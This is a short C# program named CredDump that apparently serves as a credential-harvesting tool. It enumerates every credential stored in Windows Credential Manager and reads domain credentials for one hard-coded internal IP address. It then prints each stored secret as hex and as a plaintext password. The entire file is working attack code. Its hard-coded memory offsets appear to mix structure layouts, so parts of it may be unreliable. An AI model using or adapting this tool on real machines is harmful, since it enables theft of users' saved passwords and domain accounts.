using System; using System.Runtime.InteropServices; using System.Text; class CredDump { [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)] static extern bool CredRead(string target, int type, int flags, out IntPtr cred); [DllImport("advapi32.dll")] static extern void CredFree(IntPtr buffer); [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)] static extern bool CredEnumerate(string filter, int flags, out int count, out IntPtr creds); static void Main() { // Try enumerate first int count = 0; IntPtr pCreds = IntPtr.Zero; bool ok = CredEnumerate(null, 0, out count, out pCreds); Console.WriteLine("Enumerate: " + ok + " count=" + count + " err=" + Marshal.GetLastWin32Error()); if (ok && count > 0) { for (int i = 0; i < count; i++) { IntPtr ptr = Marshal.ReadIntPtr(pCreds, i * IntPtr.Size); ReadCred(ptr); } CredFree(pCreds); } // Also try direct read string[] targets = {"192.168.101.218", "Domain:target=192.168.101.218"}; foreach (string t in targets) { IntPtr pCred = IntPtr.Zero; ok = CredRead(t, 2, 0, out pCred); Console.WriteLine("\nCredRead(" + t + "): " + ok + " err=" + Marshal.GetLastWin32Error()); if (ok) { ReadCred(pCred); CredFree(pCred); } } } static void ReadCred(IntPtr pCred) { int flags = Marshal.ReadInt32(pCred, 0); int type = Marshal.ReadInt32(pCred, 4); IntPtr targetPtr = Marshal.ReadIntPtr(pCred, 8); string target = Marshal.PtrToStringUni(targetPtr); int blobSize = Marshal.ReadInt32(pCred, 24); IntPtr blobPtr = Marshal.ReadIntPtr(pCred, 28); IntPtr userPtr = Marshal.ReadIntPtr(pCred, 48); string user = userPtr != IntPtr.Zero ? Marshal.PtrToStringUni(userPtr) : "(null)"; Console.WriteLine(" Target=" + target + " Type=" + type + " User=" + user + " BlobSize=" + blobSize); if (blobSize > 0 && blobPtr != IntPtr.Zero) { byte[] bytes = new byte[blobSize]; Marshal.Copy(blobPtr, bytes, 0, blobSize); string pwd = Encoding.Unicode.GetString(bytes); string hex = BitConverter.ToString(bytes).Replace("-",""); Console.WriteLine(" HEX=" + hex); Console.WriteLine(" PASSWORD=" + pwd); } } }